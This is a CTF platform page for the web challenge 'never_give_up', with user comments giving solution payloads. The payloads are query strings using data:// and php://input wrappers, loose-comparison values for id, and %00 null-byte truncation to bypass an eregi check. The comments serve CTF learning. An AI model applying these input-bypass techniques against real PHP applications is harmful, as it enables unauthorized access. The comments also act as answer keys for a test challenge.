never_give_upWEB 未解决

分数: 25 金币: 3
题目作者: 未知
一  血: blue
一血奖励: 1金币
解  决: 4541
提  示:
描  述:
作者:御结冰城
评论
暗流安全 1月前

/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111

回复 0

FTJJJ 2月前

POST /hello.php?id=0e123&a=php://input&b=?aaaaaaaa HTTP/1.1 bugku is a nice plateform!

回复 0

bugfuck2 2月前

查看源代码可以发现注释提示“1p.html”,打开发现会跳转,使用view-source:http://ip/1p.html查看并解码,可以看到源代码,要注意id的值如果是0,在第一步的时候就会跳转会原页面,需要用松散比较绕过,比如id=0a

回复 0

霓虹 6月前

wp解答的源代码不一样,避雷

回复 1

对对对对对对对对 7月前

依旧有点意思

回复 0

soha 8月前

$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参

回复 1

caicai0728 8月前

解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501

回复 0

2686213396 11月前

bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag

回复 0

iNMB 12月前

?id=00&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=&b=......

回复 0

zhuizhui 1年前

?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14

回复 0

WriteUp

image
harry

3 金币

评分(28)

解题动态

Sylvia 攻破了该题 1小时前
mosi mita 攻破了该题 1天前
懒懒懒大王 攻破了该题 1天前
平静的子弹 攻破了该题 2天前
青云07 攻破了该题 2天前
Spotlight 攻破了该题 3天前
18585011980 攻破了该题 3天前
HuangYanQwQ 攻破了该题 5天前
MOTMlsc 攻破了该题 5天前
luobosir 攻破了该题 6天前
dwx386572657 攻破了该题 6天前
hell0-hnc 攻破了该题 8天前
zxx256xxz 攻破了该题 8天前
Aa313010 攻破了该题 12天前
lvchijing 攻破了该题 14天前
凯哥 攻破了该题 14天前
baizhi白栀 攻破了该题 16天前
星落. 攻破了该题 17天前
fish12139 攻破了该题 18天前
GrantFly 攻破了该题 18天前
问题反馈